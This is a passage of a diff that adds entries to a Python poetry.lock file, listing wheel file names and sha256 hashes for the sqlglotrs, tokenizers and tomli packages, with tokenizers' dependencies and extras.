+ {file = "sqlglotrs-0.3.0-cp39-cp39-macosx_10_12_x86_64.whl", hash = "sha256:9aa376d3a0709746791c645858f7d59e32c0e489ee1fba82ca738901f7cd5181"},
+ {file = "sqlglotrs-0.3.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:490189f2c30e1461b9195d2e5417d6293e75f7a28917f41f2ef3689cc4539644"},
+ {file = "sqlglotrs-0.3.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:2b5cc3bbcf9c38e1e9154f08ceebbbf92fd80f9efa0cc4e1513302f368db09cd"},
+ {file = "sqlglotrs-0.3.0-cp39-cp39-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:d205ed27aec521943f5aba28bc7f252adf8abbbfff88df2dfce4c4be6dbbbae9"},
+ {file = "sqlglotrs-0.3.0-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:66503cf6afeb39fd7187b0b4db3eac4e7f715756f8f2422f2308d72284f07d84"},
+ {file = "sqlglotrs-0.3.0-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:10bbd5f041a005a1e289039cedfdd5e1132ed621344e63cd9d3ba32026c48537"},
+ {file = "sqlglotrs-0.3.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:facac3f0136fcb3220493fd4df556f01c5c0b97fb4c5fafd9f344b9128fef72b"},
+ {file = "sqlglotrs-0.3.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:b8b7e159803f17f827f691b5b818740c6f1b233588f8a2dc0a73391db14e5a54"},
+ {file = "sqlglotrs-0.3.0-cp39-none-win32.whl", hash = "sha256:d9a127109e27ccbd0bd3fd2fc66ceb25da00254d60e57985feab202df4e171dd"},
+ {file = "sqlglotrs-0.3.0-cp39-none-win_amd64.whl", hash = "sha256:dcd9300361a4c8a4719c340df669693fcff5fd6a04571378cf18c83d9b516e05"},
+ {file = "sqlglotrs-0.3.0.tar.gz", hash = "sha256:e77deb4ad2a94024e07ad9c1a15ad573b5503cacc9a948b0f5fd2d6df32156de"},
+]
+
+[[package]]
+name = "tokenizers"
+version = "0.20.3"
+description = ""
+optional = false
+python-versions = ">=3.7"
+files = [
+ {file = "tokenizers-0.20.3-cp310-cp310-macosx_10_12_x86_64.whl", hash = "sha256:31ccab28dbb1a9fe539787210b0026e22debeab1662970f61c2d921f7557f7e4"},
+ {file = "tokenizers-0.20.3-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:c6361191f762bda98c773da418cf511cbaa0cb8d0a1196f16f8c0119bde68ff8"},
+ {file = "tokenizers-0.20.3-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f128d5da1202b78fa0a10d8d938610472487da01b57098d48f7e944384362514"},
+ {file = "tokenizers-0.20.3-cp310-cp310-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:79c4121a2e9433ad7ef0769b9ca1f7dd7fa4c0cd501763d0a030afcbc6384481"},
+ {file = "tokenizers-0.20.3-cp310-cp310-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:b7850fde24197fe5cd6556e2fdba53a6d3bae67c531ea33a3d7c420b90904141"},
+ {file = "tokenizers-0.20.3-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:b357970c095dc134978a68c67d845a1e3803ab7c4fbb39195bde914e7e13cf8b"},
+ {file = "tokenizers-0.20.3-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:a333d878c4970b72d6c07848b90c05f6b045cf9273fc2bc04a27211721ad6118"},
+ {file = "tokenizers-0.20.3-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1fd9fee817f655a8f50049f685e224828abfadd436b8ff67979fc1d054b435f1"},
+ {file = "tokenizers-0.20.3-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:9e7816808b402129393a435ea2a509679b41246175d6e5e9f25b8692bfaa272b"},
+ {file = "tokenizers-0.20.3-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:ba96367db9d8a730d3a1d5996b4b7babb846c3994b8ef14008cd8660f55db59d"},
+ {file = "tokenizers-0.20.3-cp310-none-win32.whl", hash = "sha256:ee31ba9d7df6a98619426283e80c6359f167e2e9882d9ce1b0254937dbd32f3f"},
+ {file = "tokenizers-0.20.3-cp310-none-win_amd64.whl", hash = "sha256:a845c08fdad554fe0871d1255df85772f91236e5fd6b9287ef8b64f5807dbd0c"},
+ {file = "tokenizers-0.20.3-cp311-cp311-macosx_10_12_x86_64.whl", hash = "sha256:585b51e06ca1f4839ce7759941e66766d7b060dccfdc57c4ca1e5b9a33013a90"},
+ {file = "tokenizers-0.20.3-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:61cbf11954f3b481d08723ebd048ba4b11e582986f9be74d2c3bdd9293a4538d"},
+ {file = "tokenizers-0.20.3-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ef820880d5e4e8484e2fa54ff8d297bb32519eaa7815694dc835ace9130a3eea"},
+ {file = "tokenizers-0.20.3-cp311-cp311-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:67ef4dcb8841a4988cd00dd288fb95dfc8e22ed021f01f37348fd51c2b055ba9"},
+ {file = "tokenizers-0.20.3-cp311-cp311-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ff1ef8bd47a02b0dc191688ccb4da53600df5d4c9a05a4b68e1e3de4823e78eb"},
+ {file = "tokenizers-0.20.3-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:444d188186eab3148baf0615b522461b41b1f0cd58cd57b862ec94b6ac9780f1"},
+ {file = "tokenizers-0.20.3-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:37c04c032c1442740b2c2d925f1857885c07619224a533123ac7ea71ca5713da"},
+ {file = "tokenizers-0.20.3-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:453c7769d22231960ee0e883d1005c93c68015025a5e4ae56275406d94a3c907"},
+ {file = "tokenizers-0.20.3-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:4bb31f7b2847e439766aaa9cc7bccf7ac7088052deccdb2275c952d96f691c6a"},
+ {file = "tokenizers-0.20.3-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:843729bf0f991b29655a069a2ff58a4c24375a553c70955e15e37a90dd4e045c"},
+ {file = "tokenizers-0.20.3-cp311-none-win32.whl", hash = "sha256:efcce3a927b1e20ca694ba13f7a68c59b0bd859ef71e441db68ee42cf20c2442"},
+ {file = "tokenizers-0.20.3-cp311-none-win_amd64.whl", hash = "sha256:88301aa0801f225725b6df5dea3d77c80365ff2362ca7e252583f2b4809c4cc0"},
+ {file = "tokenizers-0.20.3-cp312-cp312-macosx_10_12_x86_64.whl", hash = "sha256:49d12a32e190fad0e79e5bdb788d05da2f20d8e006b13a70859ac47fecf6ab2f"},
+ {file = "tokenizers-0.20.3-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:282848cacfb9c06d5e51489f38ec5aa0b3cd1e247a023061945f71f41d949d73"},
+ {file = "tokenizers-0.20.3-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:abe4e08c7d0cd6154c795deb5bf81d2122f36daf075e0c12a8b050d824ef0a64"},
+ {file = "tokenizers-0.20.3-cp312-cp312-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:ca94fc1b73b3883c98f0c88c77700b13d55b49f1071dfd57df2b06f3ff7afd64"},
+ {file = "tokenizers-0.20.3-cp312-cp312-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ef279c7e239f95c8bdd6ff319d9870f30f0d24915b04895f55b1adcf96d6c60d"},
+ {file = "tokenizers-0.20.3-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:16384073973f6ccbde9852157a4fdfe632bb65208139c9d0c0bd0176a71fd67f"},
+ {file = "tokenizers-0.20.3-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:312d522caeb8a1a42ebdec87118d99b22667782b67898a76c963c058a7e41d4f"},
+ {file = "tokenizers-0.20.3-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f2b7cb962564785a83dafbba0144ecb7f579f1d57d8c406cdaa7f32fe32f18ad"},
+ {file = "tokenizers-0.20.3-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:124c5882ebb88dadae1fc788a582299fcd3a8bd84fc3e260b9918cf28b8751f5"},
+ {file = "tokenizers-0.20.3-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:2b6e54e71f84c4202111a489879005cb14b92616a87417f6c102c833af961ea2"},
+ {file = "tokenizers-0.20.3-cp312-none-win32.whl", hash = "sha256:83d9bfbe9af86f2d9df4833c22e94d94750f1d0cd9bfb22a7bb90a86f61cdb1c"},
+ {file = "tokenizers-0.20.3-cp312-none-win_amd64.whl", hash = "sha256:44def74cee574d609a36e17c8914311d1b5dbcfe37c55fd29369d42591b91cf2"},
+ {file = "tokenizers-0.20.3-cp313-cp313-macosx_10_12_x86_64.whl", hash = "sha256:e0b630e0b536ef0e3c8b42c685c1bc93bd19e98c0f1543db52911f8ede42cf84"},
+ {file = "tokenizers-0.20.3-cp313-cp313-macosx_11_0_arm64.whl", hash = "sha256:a02d160d2b19bcbfdf28bd9a4bf11be4cb97d0499c000d95d4c4b1a4312740b6"},
+ {file = "tokenizers-0.20.3-cp313-cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:0e3d80d89b068bc30034034b5319218c7c0a91b00af19679833f55f3becb6945"},
+ {file = "tokenizers-0.20.3-cp313-cp313-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:174a54910bed1b089226512b4458ea60d6d6fd93060254734d3bc3540953c51c"},
+ {file = "tokenizers-0.20.3-cp313-cp313-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:098b8a632b8656aa5802c46689462c5c48f02510f24029d71c208ec2c822e771"},
+ {file = "tokenizers-0.20.3-cp313-cp313-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:78c8c143e3ae41e718588281eb3e212c2b31623c9d6d40410ec464d7d6221fb5"},
+ {file = "tokenizers-0.20.3-cp313-cp313-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:2b26b0aadb18cd8701077362ba359a06683662d5cafe3e8e8aba10eb05c037f1"},
+ {file = "tokenizers-0.20.3-cp313-cp313-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:07d7851a72717321022f3774e84aa9d595a041d643fafa2e87fbc9b18711dac0"},
+ {file = "tokenizers-0.20.3-cp313-cp313-musllinux_1_1_aarch64.whl", hash = "sha256:bd44e48a430ada902c6266a8245f5036c4fe744fcb51f699999fbe82aa438797"},
+ {file = "tokenizers-0.20.3-cp313-cp313-musllinux_1_1_x86_64.whl", hash = "sha256:a4c186bb006ccbe1f5cc4e0380d1ce7806f5955c244074fd96abc55e27b77f01"},
+ {file = "tokenizers-0.20.3-cp313-none-win32.whl", hash = "sha256:6e19e0f1d854d6ab7ea0c743d06e764d1d9a546932be0a67f33087645f00fe13"},
+ {file = "tokenizers-0.20.3-cp313-none-win_amd64.whl", hash = "sha256:d50ede425c7e60966a9680d41b58b3a0950afa1bb570488e2972fa61662c4273"},
+ {file = "tokenizers-0.20.3-cp37-cp37m-macosx_10_12_x86_64.whl", hash = "sha256:9adda1ff5fb9dcdf899ceca672a4e2ce9e797adb512a6467305ca3d8bfcfbdd0"},
+ {file = "tokenizers-0.20.3-cp37-cp37m-macosx_11_0_arm64.whl", hash = "sha256:6dde2cae6004ba7a3badff4a11911cae03ebf23e97eebfc0e71fef2530e5074f"},
+ {file = "tokenizers-0.20.3-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c4a7fd678b35614fca708579eb95b7587a5e8a6d328171bd2488fd9f27d82be4"},
+ {file = "tokenizers-0.20.3-cp37-cp37m-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:1b80e3c7283a01a356bd2210f53d1a4a5d32b269c2024389ed0173137708d50e"},
+ {file = "tokenizers-0.20.3-cp37-cp37m-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:a8cc0e8176b762973758a77f0d9c4467d310e33165fb74173418ca3734944da4"},
+ {file = "tokenizers-0.20.3-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:d5634b2e2f5f3d2b4439d2d74066e22eb4b1f04f3fea05cb2a3c12d89b5a3bcd"},
+ {file = "tokenizers-0.20.3-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:b4ba635165bc1ea46f2da8e5d80b5f70f6ec42161e38d96dbef33bb39df73964"},
+ {file = "tokenizers-0.20.3-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:18e4c7c64172e7789bd8b07aa3087ea87c4c4de7e90937a2aa036b5d92332536"},
+ {file = "tokenizers-0.20.3-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:1f74909ef7675c26d4095a817ec3393d67f3158ca4836c233212e5613ef640c4"},
+ {file = "tokenizers-0.20.3-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:0e9b81321a1e05b16487d312b4264984513f8b4a7556229cafac6e88c2036b09"},
+ {file = "tokenizers-0.20.3-cp37-none-win32.whl", hash = "sha256:ab48184cd58b4a03022a2ec75b54c9f600ffea9a733612c02325ed636f353729"},
+ {file = "tokenizers-0.20.3-cp37-none-win_amd64.whl", hash = "sha256:60ac483cebee1c12c71878523e768df02fa17e4c54412966cb3ac862c91b36c1"},
+ {file = "tokenizers-0.20.3-cp38-cp38-macosx_10_12_x86_64.whl", hash = "sha256:3229ef103c89583d10b9378afa5d601b91e6337530a0988e17ca8d635329a996"},
+ {file = "tokenizers-0.20.3-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:6ac52cc24bad3de865c7e65b1c4e7b70d00938a8ae09a92a453b8f676e714ad5"},
+ {file = "tokenizers-0.20.3-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:04627b7b502fa6a2a005e1bd446fa4247d89abcb1afaa1b81eb90e21aba9a60f"},
+ {file = "tokenizers-0.20.3-cp38-cp38-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:c27ceb887f0e81a3c377eb4605dca7a95a81262761c0fba308d627b2abb98f2b"},
+ {file = "tokenizers-0.20.3-cp38-cp38-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:65ab780194da4e1fcf5670523a2f377c4838ebf5249efe41fa1eddd2a84fb49d"},
+ {file = "tokenizers-0.20.3-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:98d343134f47159e81f7f242264b0eb222e6b802f37173c8d7d7b64d5c9d1388"},
+ {file = "tokenizers-0.20.3-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:f2475bb004ab2009d29aff13b5047bfdb3d4b474f0aa9d4faa13a7f34dbbbb43"},
+ {file = "tokenizers-0.20.3-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7b6583a65c01db1197c1eb36857ceba8ec329d53afadd268b42a6b04f4965724"},
+ {file = "tokenizers-0.20.3-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:62d00ba208358c037eeab7bfc00a905adc67b2d31b68ab40ed09d75881e114ea"},
+ {file = "tokenizers-0.20.3-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:0fc7a39e5bedc817bda395a798dfe2d9c5f7c71153c90d381b5135a0328d9520"},
+ {file = "tokenizers-0.20.3-cp38-none-win32.whl", hash = "sha256:84d40ee0f8550d64d3ea92dd7d24a8557a9172165bdb986c9fb2503b4fe4e3b6"},
+ {file = "tokenizers-0.20.3-cp38-none-win_amd64.whl", hash = "sha256:205a45246ed7f1718cf3785cff88450ba603352412aaf220ace026384aa3f1c0"},
+ {file = "tokenizers-0.20.3-cp39-cp39-macosx_10_12_x86_64.whl", hash = "sha256:93e37f0269a11dc3b1a953f1fca9707f0929ebf8b4063c591c71a0664219988e"},
+ {file = "tokenizers-0.20.3-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:f4cb0c614b0135e781de96c2af87e73da0389ac1458e2a97562ed26e29490d8d"},
+ {file = "tokenizers-0.20.3-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:7eb2fb1c432f5746b22f8a7f09fc18c4156cb0031c77f53cb19379d82d43297a"},
+ {file = "tokenizers-0.20.3-cp39-cp39-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:bfa8d029bb156181b006643309d6b673615a24e4ed24cf03aa191d599b996f51"},
+ {file = "tokenizers-0.20.3-cp39-cp39-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6f90549622de3bf476ad9f1dd6f3f952ec3ed6ab8615ae88ef060d0c5bfad55d"},
+ {file = "tokenizers-0.20.3-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:a1d469c74eebf5c43fd61cd9b030e271d17198edd7bd45392e03a3c091d7d6d4"},
+ {file = "tokenizers-0.20.3-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:bee8f53b2594749f4460d53253bae55d718f04e9b633efa0f5df8938bd98e4f0"},
+ {file = "tokenizers-0.20.3-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:938441babf3e5720e4459e306ef2809fb267680df9d1ff2873458b22aef60248"},
+ {file = "tokenizers-0.20.3-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:7310ab23d7b0caebecc0e8be11a1146f320f5f07284000f6ea54793e83de1b75"},
+ {file = "tokenizers-0.20.3-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:16121eb030a2b13094cfec936b0c12e8b4063c5f839591ea7d0212336d8f9921"},
+ {file = "tokenizers-0.20.3-cp39-none-win32.whl", hash = "sha256:401cc21ef642ee235985d747f65e18f639464d377c70836c9003df208d582064"},
+ {file = "tokenizers-0.20.3-cp39-none-win_amd64.whl", hash = "sha256:7498f3ea7746133335a6adb67a77cf77227a8b82c8483f644a2e5f86fea42b8d"},
+ {file = "tokenizers-0.20.3-pp310-pypy310_pp73-macosx_10_12_x86_64.whl", hash = "sha256:e919f2e3e68bb51dc31de4fcbbeff3bdf9c1cad489044c75e2b982a91059bd3c"},
+ {file = "tokenizers-0.20.3-pp310-pypy310_pp73-macosx_11_0_arm64.whl", hash = "sha256:b8e9608f2773996cc272156e305bd79066163a66b0390fe21750aff62df1ac07"},
+ {file = "tokenizers-0.20.3-pp310-pypy310_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:39270a7050deaf50f7caff4c532c01b3c48f6608d42b3eacdebdc6795478c8df"},
+ {file = "tokenizers-0.20.3-pp310-pypy310_pp73-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:e005466632b1c5d2d2120f6de8aa768cc9d36cd1ab7d51d0c27a114c91a1e6ee"},
+ {file = "tokenizers-0.20.3-pp310-pypy310_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a07962340b36189b6c8feda552ea1bfeee6cf067ff922a1d7760662c2ee229e5"},
+ {file = "tokenizers-0.20.3-pp310-pypy310_pp73-musllinux_1_1_aarch64.whl", hash = "sha256:55046ad3dd5f2b3c67501fcc8c9cbe3e901d8355f08a3b745e9b57894855f85b"},
+ {file = "tokenizers-0.20.3-pp310-pypy310_pp73-musllinux_1_1_x86_64.whl", hash = "sha256:efcf0eb939988b627558aaf2b9dc3e56d759cad2e0cfa04fcab378e4b48fc4fd"},
+ {file = "tokenizers-0.20.3-pp37-pypy37_pp73-macosx_10_12_x86_64.whl", hash = "sha256:f3558a7ae6a6d38a77dfce12172a1e2e1bf3e8871e744a1861cd7591ea9ebe24"},
+ {file = "tokenizers-0.20.3-pp37-pypy37_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4d53029fe44bc70c3ff14ef512460a0cf583495a0f8e2f4b70e26eb9438e38a9"},
+ {file = "tokenizers-0.20.3-pp37-pypy37_pp73-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:57a2a56397b2bec5a629b516b23f0f8a3e4f978c7488d4a299980f8375954b85"},
+ {file = "tokenizers-0.20.3-pp37-pypy37_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b1e5bfaae740ef9ece000f8a07e78ac0e2b085c5ce9648f8593ddf0243c9f76d"},
+ {file = "tokenizers-0.20.3-pp37-pypy37_pp73-musllinux_1_1_aarch64.whl", hash = "sha256:fbaf3ea28fedfb2283da60e710aff25492e795a7397cad8a50f1e079b65a5a70"},
+ {file = "tokenizers-0.20.3-pp37-pypy37_pp73-musllinux_1_1_x86_64.whl", hash = "sha256:c47c037116310dc976eb96b008e41b9cfaba002ed8005848d4d632ee0b7ba9ae"},
+ {file = "tokenizers-0.20.3-pp38-pypy38_pp73-macosx_10_12_x86_64.whl", hash = "sha256:c31751f0721f58f5e19bb27c1acc259aeff860d8629c4e1a900b26a1979ada8e"},
+ {file = "tokenizers-0.20.3-pp38-pypy38_pp73-macosx_11_0_arm64.whl", hash = "sha256:c697cbd3be7a79ea250ea5f380d6f12e534c543cfb137d5c734966b3ee4f34cc"},
+ {file = "tokenizers-0.20.3-pp38-pypy38_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b48971b88ef9130bf35b41b35fd857c3c4dae4a9cd7990ebc7fc03e59cc92438"},
+ {file = "tokenizers-0.20.3-pp38-pypy38_pp73-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:4e615de179bbe060ab33773f0d98a8a8572b5883dd7dac66c1de8c056c7e748c"},
+ {file = "tokenizers-0.20.3-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:da1ec842035ed9999c62e45fbe0ff14b7e8a7e02bb97688cc6313cf65e5cd755"},
+ {file = "tokenizers-0.20.3-pp38-pypy38_pp73-musllinux_1_1_aarch64.whl", hash = "sha256:6ee4954c1dd23aadc27958dad759006e71659d497dcb0ef0c7c87ea992c16ebd"},
+ {file = "tokenizers-0.20.3-pp38-pypy38_pp73-musllinux_1_1_x86_64.whl", hash = "sha256:3eda46ca402751ec82553a321bf35a617b76bbed7586e768c02ccacbdda94d6d"},
+ {file = "tokenizers-0.20.3-pp39-pypy39_pp73-macosx_10_12_x86_64.whl", hash = "sha256:de082392a85eb0055cc055c535bff2f0cc15d7a000bdc36fbf601a0f3cf8507a"},
+ {file = "tokenizers-0.20.3-pp39-pypy39_pp73-macosx_11_0_arm64.whl", hash = "sha256:c3db46cc0647bfd88263afdb739b92017a02a87ee30945cb3e86c7e25c7c9917"},
+ {file = "tokenizers-0.20.3-pp39-pypy39_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a292392f24ab9abac5cfa8197e5a6208f2e43723420217e1ceba0b4ec77816ac"},
+ {file = "tokenizers-0.20.3-pp39-pypy39_pp73-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:8dcd91f4e60f62b20d83a87a84fe062035a1e3ff49a8c2bbdeb2d441c8e311f4"},
+ {file = "tokenizers-0.20.3-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:900991a2b8ee35961b1095db7e265342e0e42a84c1a594823d5ee9f8fb791958"},
+ {file = "tokenizers-0.20.3-pp39-pypy39_pp73-musllinux_1_1_aarch64.whl", hash = "sha256:5a8d8261ca2133d4f98aa9627c748189502b3787537ba3d7e2beb4f7cfc5d627"},
+ {file = "tokenizers-0.20.3-pp39-pypy39_pp73-musllinux_1_1_x86_64.whl", hash = "sha256:c4fd4d71e6deb6ddf99d8d0eab87d1d16f635898906e631914a9bae8ae9f2cfb"},
+ {file = "tokenizers-0.20.3.tar.gz", hash = "sha256:2278b34c5d0dd78e087e1ca7f9b1dcbf129d80211afa645f214bd6e051037539"},
+]
+
+[package.dependencies]
+huggingface-hub = ">=0.16.4,<1.0"
+
+[package.extras]
+dev = ["tokenizers[testing]"]
+docs = ["setuptools-rust", "sphinx", "sphinx-rtd-theme"]
+testing = ["black (==22.3)", "datasets", "numpy", "pytest", "requests", "ruff"]
+
+[[package]]
+name = "tomli"
+version = "2.2.1"
+description = "A lil' TOML parser"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "tomli-2.2.1-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:678e4fa69e4575eb77d103de3df8a895e1591b48e740211bd1067378c69e8249"},
+ {file = "tomli-2.2.1-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:023aa114dd824ade0100497eb2318602af309e5a55595f76b626d6d9f3b7b0a6"},
+ {file = "tomli-2.2.1-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ece47d672db52ac607a3d9599a9d48dcb2f2f735c6c2d1f34130085bb12b112a"},
+ {file = "tomli-2.2.1-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6972ca9c9cc9f0acaa56a8ca1ff51e7af152a9f87fb64623e31d5c83700080ee"},
+ {file = "tomli-2.2.1-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:c954d2250168d28797dd4e3ac5cf812a406cd5a92674ee4c8f123c889786aa8e"},
+ {file = "tomli-2.2.1-cp311-cp311-musllinux_1_2_aarch64.whl", hash = "sha256:8dd28b3e155b80f4d54beb40a441d366adcfe740969820caf156c019fb5c7ec4"},
+ {file = "tomli-2.2.1-cp311-cp311-musllinux_1_2_i686.whl", hash = "sha256:e59e304978767a54663af13c07b3d1af22ddee3bb2fb0618ca1593e4f593a106"},
+ {file = "tomli-2.2.1-cp311-cp311-musllinux_1_2_x86_64.whl", hash = "sha256:33580bccab0338d00994d7f16f4c4ec25b776af3ffaac1ed74e0b3fc95e885a8"},
+ {file = "tomli-2.2.1-cp311-cp311-win32.whl", hash = "sha256:465af0e0875402f1d226519c9904f37254b3045fc5084697cefb9bdde1ff99ff"},
+ {file = "tomli-2.2.1-cp311-cp311-win_amd64.whl", hash = "sha256:2d0f2fdd22b02c6d81637a3c95f8cd77f995846af7414c5c4b8d0545afa1bc4b"},
+ {file = "tomli-2.2.1-cp312-cp312-macosx_10_13_x86_64.whl", hash = "sha256:4a8f6e44de52d5e6c657c9fe83b562f5f4256d8ebbfe4ff922c495620a7f6cea"},
+ {file = "tomli-2.2.1-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:8d57ca8095a641b8237d5b079147646153d22552f1c637fd3ba7f4b0b29167a8"},
+ {file = "tomli-2.2.1-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4e340144ad7ae1533cb897d406382b4b6fede8890a03738ff1683af800d54192"},
+ {file = "tomli-2.2.1-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:db2b95f9de79181805df90bedc5a5ab4c165e6ec3fe99f970d0e302f384ad222"},
+ {file = "tomli-2.2.1-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:40741994320b232529c802f8bc86da4e1aa9f413db394617b9a256ae0f9a7f77"},
+ {file = "tomli-2.2.1-cp312-cp312-musllinux_1_2_aarch64.whl", hash = "sha256:400e720fe168c0f8521520190686ef8ef033fb19fc493da09779e592861b78c6"},
+ {file = "tomli-2.2.1-cp312-cp312-musllinux_1_2_i686.whl", hash = "sha256:02abe224de6ae62c19f090f68da4e27b10af2b93213d36cf44e6e1c5abd19fdd"},
+ {file = "tomli-2.2.1-cp312-cp312-musllinux_1_2_x86_64.whl", hash = "sha256:b82ebccc8c8a36f2094e969560a1b836758481f3dc360ce9a3277c65f374285e"},
+ {file = "tomli-2.2.1-cp312-cp312-win32.whl", hash = "sha256:889f80ef92701b9dbb224e49ec87c645ce5df3fa2cc548664eb8a25e03127a98"},
+ {file = "tomli-2.2.1-cp312-cp312-win_amd64.whl", hash = "sha256:7fc04e92e1d624a4a63c76474610238576942d6b8950a2d7f908a340494e67e4"},
+ {file = "tomli-2.2.1-cp313-cp313-macosx_10_13_x86_64.whl", hash = "sha256:f4039b9cbc3048b2416cc57ab3bda989a6fcf9b36cf8937f01a6e731b64f80d7"},
+ {file = "tomli-2.2.1-cp313-cp313-macosx_11_0_arm64.whl", hash = "sha256:286f0ca2ffeeb5b9bd4fcc8d6c330534323ec51b2f52da063b11c502da16f30c"},
+ {file = "tomli-2.2.1-cp313-cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a92ef1a44547e894e2a17d24e7557a5e85a9e1d0048b0b5e7541f76c5032cb13"},
